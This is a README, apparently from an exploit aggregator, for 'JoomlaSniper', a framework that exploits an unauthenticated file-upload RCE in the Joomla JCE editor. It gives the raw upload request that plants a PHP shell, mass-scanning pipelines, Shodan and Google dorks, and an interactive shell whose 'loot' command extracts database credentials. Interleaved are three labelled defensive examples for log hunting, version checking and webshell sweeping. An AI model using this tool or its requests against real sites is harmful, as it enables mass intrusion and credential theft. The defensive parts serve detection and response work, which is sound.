Source: https://sploitus.com/exploit?id=899D9532-0589-53D4-8FFC-45107C8FD074
# JoomlaSniper

CVE-2026-48907: Joomla JCE Editor Unauthenticated RCE Framework

Overview • Attack Chain • Features • Installation • Usage • Shell • Versions
---
## Overview
**JoomlaSniper** is a comprehensive exploitation framework for **CVE-2026-48907**, an unauthenticated remote code execution vulnerability in the **JCE (Joomla Content Editor)** extension for Joomla CMS.
The vulnerability lets an attacker upload arbitrary PHP files through the `profiles.import` task of `com_jce` without authenticating. Depending on server configuration, this results in full remote code execution.
**CVE-2026-48907: Technical Summary**

| Field | Value |
|-------|-------|
| Vendor | Joomla Content Editor (joomlacontenteditor.net) |
| Type | Unauthenticated File Upload → RCE |
| CVSS Score | 10.0 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-434 (Unrestricted Upload of File with Dangerous Type) |
| Affected | JCE 1.0.0 through 2.9.99.4 (all versions before the fix) |
| Patched | JCE 2.9.99.5 |
> ⚠️ **Authorized testing only.** This tool is intended for bug bounty hunting and penetration testing on systems you own or have explicit written permission to test.
---
## Attack Chain
JoomlaSniper implements two independent attack vectors:
1. **Detect the JCE plugin.** Fingerprints: `/plugins/editors/jce/jce.xml` and `/administrator/components/com_jce/`. The installed version is read from the manifest (e.g. `2.9.82`).
2. **Extract the CSRF token** from the site root (`/`).
3. **Vector 1: `tmp/`.** `POST` with `task=profiles.import`; the uploaded `*.xml.php` is saved as `/tmp/{file}.php` and PHP executes it.
4. **Vector 2: `images/`.** Import a permissive profile that enables PHP uploads, then upload through the JCE browser RPC; the file lands at `/images/{f}.php`.
### Vector 1: Profile Import to `/tmp/` (Primary)
The core vulnerability: JCE's `profiles.import` task (`index.php?option=com_jce`) accepts file uploads without authentication. The uploaded file is saved to the Joomla `tmp/` directory **without any filename or content validation**. The CSRF token is sent Joomla-style, as a form field whose name is the token and whose value is `1`.
```http
POST /index.php?option=com_jce HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=boundary

--boundary
Content-Disposition: form-data; name="task"

profiles.import
--boundary
Content-Disposition: form-data; name="{CSRF_TOKEN}"

1
--boundary
Content-Disposition: form-data; name="profile_file"; filename="shell.xml.php"
Content-Type: application/xml

--boundary--
```
**Result:** `https://target.com/tmp/shell.xml.php` → RCE
### Vector 2: JCE Browser Plugin to `/images/` (Fallback)
If Vector 1 fails, JoomlaSniper imports a permissive JCE profile (one that enables PHP uploads), then uploads directly through the JCE browser RPC endpoint. Files land in `/images/`; a file uploaded as `.gif` can then be renamed to `.php`.
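An added detection example for the blue team, not part of JoomlaSniper or the original PoC: it replays constructed Apache combined-format access log lines and flags the trace both vectors leave, a PHP file served from `/tmp/` or `/images/`, raising severity when the same client posted to `option=com_jce` shortly before. The log lines, IPs, timestamps and the 300-second window are this example's own; the `task=profiles.import` body is never written to an access log, so the POST is recognised by its query string alone.

```python
"""Added example, not JoomlaSniper's or the PoC's code: hunt access logs for the
trail this attack chain leaves.  Both vectors end with a PHP file being served
from /tmp/ or /images/; Vector 1 is preceded by a POST to option=com_jce."""
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" log format.  The POST body (where task=profiles.import
# travels) is never logged, so the request is recognised by its query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A PHP file anywhere under tmp/ or images/, including double extensions
# such as .xml.php (the query string is stripped before matching).
SHELL_PATH_RE = re.compile(r"^/(tmp|images)/.*\.php\b", re.IGNORECASE)

# Constructed sample: one full Vector 1 chain, one unrelated 404 probe and one
# PHP hit under images/ with no preceding com_jce POST.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:14:02:11 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2026:14:02:12 +0000] "GET /plugins/editors/jce/jce.xml HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2026:14:02:13 +0000] "POST /index.php?option=com_jce HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2026:14:02:14 +0000] "GET /tmp/jce4x2k9a.xml.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2026:14:05:01 +0000] "GET /images/logo.php HTTP/1.1" 404 230 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2026:14:07:40 +0000] "GET /images/upload.php HTTP/1.1" 200 12 "-" "curl/8.5.0"
"""


def parse_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": path,
        "query": query,
        "status": int(m["status"]),
    }


def is_com_jce_post(ev):
    """The framework's import request: POST /index.php?option=com_jce."""
    return ev["method"] == "POST" and ev["path"] == "/index.php" and "option=com_jce" in ev["query"]


def is_webshell_hit(ev):
    """A PHP file under tmp/ or images/ answered 200: the end state of both vectors."""
    return ev["status"] == 200 and SHELL_PATH_RE.match(ev["path"]) is not None


def analyze(lines, window_seconds=300):
    """Correlate per client IP: a webshell hit within window_seconds of a
    com_jce POST from the same IP is 'high'; a bare hit is 'medium'."""
    events = [e for e in map(parse_line, lines) if e is not None]
    last_post = {}  # ip -> timestamp of its most recent com_jce POST
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_com_jce_post(ev):
            last_post[ev["ip"]] = ev["ts"]
        elif is_webshell_hit(ev):
            prior = last_post.get(ev["ip"])
            correlated = prior is not None and ev["ts"] - prior <= timedelta(seconds=window_seconds)
            alerts.append({
                "ip": ev["ip"],
                "path": ev["path"],
                "preceded_by_com_jce_post": correlated,
                "severity": "high" if correlated else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(alert)
```

A 404 against `/images/*.php` is deliberately not alerted on: it is a probe, not a confirmed file on disk, and on a busy site it would drown the real hits. Feed the script `access.log` lines via `analyze(open(path).read().splitlines())` and pivot on the `ip` of any `high` alert.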
---
## Features
| Feature | Description |
|---------|-------------|
| **Dual Vector** | V1 (`tmp/`) → V2 (`images/`) automatic fallback |
| **Interactive Shell** | Full PTY-like shell with built-in commands |
| **Zero Dependencies** | Pure Python stdlib; no pip required |
| **Pipeline Support** | `subfinder \| httpx \| JoomlaSniper` |
| **Multi-Store** | Auto-detects Joomla store code (en, de, fr, etc.) |
| **FP-Free Verify** | RXST/base64 decode check; no false positives |
| **Version Detect** | Reads JCE version, skips patched (≥ 2.9.99.5) |
| **Multi-Function Shell** | `shell_exec → exec → system → passthru → popen` fallback |
| **Threaded Bulk Scan** | Configurable thread count for mass scanning |
| **JSON Report** | Machine-readable output with `-o results.json` |
---
## Installation
```bash
# Clone the repository
git clone https://github.com/ynsmroztas/JoomlaSniper
cd JoomlaSniper
# No dependencies needed: pure stdlib
python3 JoomlaSniper.py --help
```
**Requirements:** Python 3.10+
---
## Usage
### Single Target
```bash
# Detection only: checks JCE version and file upload
python3 JoomlaSniper.py -u https://joomla.target.com
# Detection + interactive shell on confirmed RCE
python3 JoomlaSniper.py -u https://joomla.target.com --shell
```
### Bulk Scan
```bash
# Scan a list of targets
python3 JoomlaSniper.py -l targets.txt -t 15
# With JSON output
python3 JoomlaSniper.py -l targets.txt -t 20 -o results.json --silent
```
### Pipeline (subfinder + httpx + JoomlaSniper)
```bash
# Full recon pipeline: find Joomla sites with JCE
subfinder -d target.com -silent | \
httpx -silent -match-string "com_jce" | \
python3 JoomlaSniper.py -t 10 -o results.json
# Shodan export → httpx filter → JoomlaSniper
cat shodan_results.txt | \
httpx -silent -path /plugins/editors/jce/jce.xml -status-code -match-code 200 | \
awk '{print $1}' | \
python3 JoomlaSniper.py -t 20 --silent -o rce_results.json
```
### Custom Store Code
```bash
# Multi-language Joomla (auto-detect tries: default, en, de, fr, es, nl...)
python3 JoomlaSniper.py -u https://target.com --store nl
# Test Docker lab environment
python3 JoomlaSniper.py -u http://localhost:9999 --shell
```
### All Options
```
usage: JoomlaSniper.py [-h] [-u URL] [-l LIST] [-t THREADS]
[--timeout TIMEOUT] [--shell] [--store STORE]
[-o OUTPUT] [--silent] [--no-color]
options:
-u, --url Single target URL
-l, --list File with URLs (one per line)
-t, --threads Threads for bulk scan (default: 10)
--timeout Request timeout in seconds (default: 12)
--shell Launch interactive shell on confirmed RCE
--store Joomla store code (default: auto-detect)
-o, --output JSON report output file
--silent Suppress per-target output
--no-color Disable ANSI color output
```
---
## Interactive Shell
When RCE is confirmed, `--shell` launches a full interactive session:
```
==================================================
 JOOMLASNIPER - INTERACTIVE SHELL
 Target : https://target.com
 Shell  : https://target.com/tmp/jce4x2k9a.xml.php
 Vector : V1:tmp
==================================================
jce@target.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
jce@target.com$ sysinfo
OS: Linux server 5.4.0-208-generic #228-Ubuntu
User: uid=33(www-data)
CWD: /var/www/html
PHP: PHP 8.1.27
jce@target.com$ loot
/var/www/html/configuration.php
$user = 'joomla_db_user';
$password = 'S3cur3P@ssw0rd!';
$db = 'joomla_production';
$host = 'localhost';
jce@target.com$ funcs
shell_exec: OK
exec: OK
system: OK
passthru: OK
jce@target.com$ exit
Shell session ended.
```
### Built-in Commands
| Command | Description |
|---------|-------------|
| `sysinfo` | OS, PHP version, current user, working directory |
| `loot` | Find Joomla `configuration.php` and extract DB credentials |
| `funcs` | List available PHP execution functions |
| `phpinfo` | Show `disable_functions` and PHP config |
| `debug` | Show raw HTTP response (diagnose shell issues) |
| `exit` | Close shell session |
| any other input | Executed as a system command on the target |
### Shell Function Fallback Chain
When `shell_exec` is disabled (common on shared hosting), JoomlaSniper automatically tries alternatives:
```
shell_exec → exec → system → passthru → popen → proc_open
```
---
## Affected Versions
| Version | Status |
|---------|--------|
| JCE 1.0.0 through 2.9.99.4 | ❌ Vulnerable (all production versions) |
| JCE 2.9.99.5 | ✅ Patched |
> **Note:** The vulnerable code has existed since the first JCE release. The vendor fixed it only in 2.9.99.5 and there is **no backport** to older production branches.
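The version check that the attack chain's detection step and the table above rely on, as an added example that is not JoomlaSniper's code: it reads the `<version>` element from a constructed `jce.xml` manifest and compares it numerically against 2.9.99.5, since comparing version strings lexically misorders four-part versions such as `2.10.0` against `2.9.99.5`. The manifest sample and the function names are this example's own assumptions.

```python
"""Added example, not JoomlaSniper's code: read the JCE version from the
plugin manifest and decide whether it predates the 2.9.99.5 fix."""
import re
import xml.etree.ElementTree as ET

PATCHED_VERSION = "2.9.99.5"  # first fixed release per the advisory summary

# Constructed stand-in for /plugins/editors/jce/jce.xml.  A real manifest has
# more elements; only the <version> element matters for the check.
SAMPLE_MANIFEST = """<extension type="plugin" group="editors" method="upgrade">
    <name>plg_editors_jce</name>
    <version>2.9.82</version>
    <description>PLG_JCE_XML_DESCRIPTION</description>
</extension>
"""


def parse_version(text: str) -> tuple:
    """'2.9.99.4' -> (2, 9, 99, 4).  Tuples of ints compare numerically;
    comparing the strings would rank '2.10.0' below '2.9.99.5'."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def manifest_version(xml_text: str) -> str:
    """Extract the <version> element; fail loudly rather than guess."""
    node = ET.fromstring(xml_text).find("version")
    if node is None or not (node.text or "").strip():
        raise ValueError("manifest has no <version> element")
    return node.text.strip()


def is_patched(version: str, patched: str = PATCHED_VERSION) -> bool:
    """Right-pad with zeros so '2.10' is compared as 2.10.0.0."""
    a, b = parse_version(version), parse_version(patched)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a >= b


def classify(xml_text: str) -> dict:
    """Mirror the jce_ver / patched fields of the tool's JSON report."""
    version = manifest_version(xml_text)
    return {"jce_ver": version, "patched": is_patched(version)}


if __name__ == "__main__":
    print(classify(SAMPLE_MANIFEST))
```

Against a live site the same logic applies to the body of `GET /plugins/editors/jce/jce.xml`; if the manifest is not served (many hosts block direct access to `.xml`), the absence of a version should be reported as unknown rather than treated as unpatched.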
### Impact by Server Configuration
| Scenario | Impact |
|----------|--------|
| PHP execution allowed in `tmp/` | ✅ Full RCE: code executes |
| PHP execution blocked in `tmp/` | ⚠️ File write: persistent PHP file on disk |
| PHP execution blocked everywhere | ℹ️ Detection only: no immediate RCE |
> Even when PHP execution is blocked, the uploaded file **persists on disk**. A future configuration change, server migration, or web server update could expose it to execution.
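An added incident-response sweep for the persistence caveat above, not part of the tool: it walks a docroot's `tmp/` and `images/` trees (the directories the two vectors write into) and reports every file with a PHP-family extension anywhere in its name, so `*.xml.php` from Vector 1 and `.gif`-renamed uploads from Vector 2 are both caught. The demo docroot it builds is constructed for a stand-alone run and contains an inert placeholder, not a payload.

```python
"""Added example, not part of the tool: sweep a Joomla docroot for PHP files
left under tmp/ and images/, which survive on disk whether or not the web
server is willing to execute them."""
import re
import tempfile
from pathlib import Path

# The directories the two vectors write into.
SUSPECT_DIRS = ("tmp", "images")
# Match a PHP-family extension anywhere in the name, not just at the end, so
# shell.xml.php, logo.php.gif and foo.phtml are all reported.
PHP_NAME_RE = re.compile(r"\.(?:php\d?|phtml|phar)(?:\.|$)", re.IGNORECASE)


def suspicious_files(docroot):
    """Return dicts (path, size, mtime) for PHP-named files under the suspect
    directories, sorted by path so output is stable for diffing between runs."""
    root = Path(docroot)
    hits = []
    for sub in SUSPECT_DIRS:
        base = root / sub
        if not base.is_dir():
            continue
        for p in base.rglob("*"):
            if p.is_file() and PHP_NAME_RE.search(p.name):
                st = p.stat()
                hits.append({
                    "path": p.relative_to(root).as_posix(),
                    "size": st.st_size,
                    "mtime": int(st.st_mtime),
                })
    return sorted(hits, key=lambda h: h["path"])


def build_demo_docroot():
    """Constructed layout for a stand-alone run; the 'shell' is an inert
    placeholder, not a payload."""
    root = Path(tempfile.mkdtemp(prefix="joomla_demo_"))
    (root / "tmp").mkdir()
    (root / "images" / "banners").mkdir(parents=True)
    (root / "tmp" / "jce4x2k9a.xml.php").write_text("<?php /* placeholder */ ?>\n")
    (root / "tmp" / "index.html").write_text("<!DOCTYPE html>\n")          # benign
    (root / "images" / "banners" / "logo.php.gif").write_text("GIF89a\n")  # renamed-upload pattern
    (root / "images" / "powered_by.png").write_bytes(b"\x89PNG\r\n")        # benign
    (root / "templates" / "x").mkdir(parents=True)
    (root / "templates" / "x" / "index.php").write_text("<?php ?>\n")      # legitimate, outside suspect dirs
    return root


if __name__ == "__main__":
    demo = build_demo_docroot()
    for hit in suspicious_files(demo):
        print(hit)
```

Run `suspicious_files("/var/www/html")` on the real docroot and keep the `mtime` values: they date the upload and give the access-log hunt a time window. Quarantine rather than delete, since the file is evidence.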
---
## Shodan Queries
```
# JCE-specific fingerprints
http.html:"editors/jce"
http.html:"com_jce"
http.html:"/media/editors/jce/js"
# Combined with Joomla
http.html:"Joomla" http.html:"editors/jce"
```
**FOFA:**
```
body="editors/jce" && body="Joomla"
```
**Google:**
```
inurl:"option=com_jce"
inurl:"/plugins/editors/jce/"
```
---
## Output Example
```json
[
{
"target": "https://target.com",
"jce_found": true,
"jce_ver": "2.9.82",
"patched": false,
"vector": "V1:tmp",
"rce": true,
"shell_url": "https://target.com/tmp/jce4x2k9a.xml.php",
"upload_path": "/tmp/jce4x2k9a.xml.php"
}
]
```
---
## Test Lab (Docker)
The original PoC repo by ywh-jfellus (linked under References) includes a Docker Compose lab:
```bash
# Clone test environment
git clone https://github.com/ywh-jfellus/CVE-2026-48907
cd CVE-2026-48907
# Start vulnerable instance (JCE 2.9.99.4)
docker compose -f vulnerable/docker-compose.yaml up -d
# Run JoomlaSniper (from the JoomlaSniper checkout) against the lab
python3 JoomlaSniper.py -u http://localhost:9999 --shell
# Start patched instance (JCE 2.9.99.5) to verify detection
docker compose -f patched/docker-compose.yaml up -d
python3 JoomlaSniper.py -u http://localhost:9999
# Expected: [PATCHED] JCE 2.9.99.5 >= 2.9.99.5
```
---
## Exit Codes
| Code | Meaning |
|------|---------|
| `0` | No vulnerable targets found |
| `1` | File upload confirmed (no PHP execution) |
| `2` | RCE confirmed: PHP execution verified |
Useful for automation:
```bash
python3 JoomlaSniper.py -u https://target.com --silent
if [ $? -eq 2 ]; then
echo "RCE confirmed: sending report"
fi
```
---
## References
- [NVD β CVE-2026-48907](https://nvd.nist.gov/vuln/detail/CVE-2026-48907)
- [GitHub Advisory GHSA-c3f5-4g7f-qjqj](https://github.com/advisories/GHSA-c3f5-4g7f-qjqj)
- [Original PoC by ywh-jfellus](https://github.com/ywh-jfellus/CVE-2026-48907)
- [BIBIL_0DAY Mass Scanner](https://github.com/webshellseo8/CVE-2026-48907-Unauthenticated-RCE-in-JCE)
- [JCE Official Changelog](https://www.joomlacontenteditor.net/support/documentation/changelog)
---
## Disclaimer
This tool is provided for **educational purposes and authorized security testing only**.
- Only use against systems you own or have explicit written authorization to test
- The author is not responsible for any misuse or damage caused by this tool
- Bug bounty hunters: ensure the target is in scope before testing
- Responsible disclosure: report findings to vendors before public disclosure
---
## Author
**Mitsec** ([@ynsmroztas](https://x.com/ynsmroztas))
Top Hacker @ Intigriti | Bug Bounty Hunter
[Intigriti](https://www.intigriti.com) · [HackerOne](https://hackerone.com) · [@ynsmroztas on X](https://x.com/ynsmroztas)
---
Built with ❤️ for the security community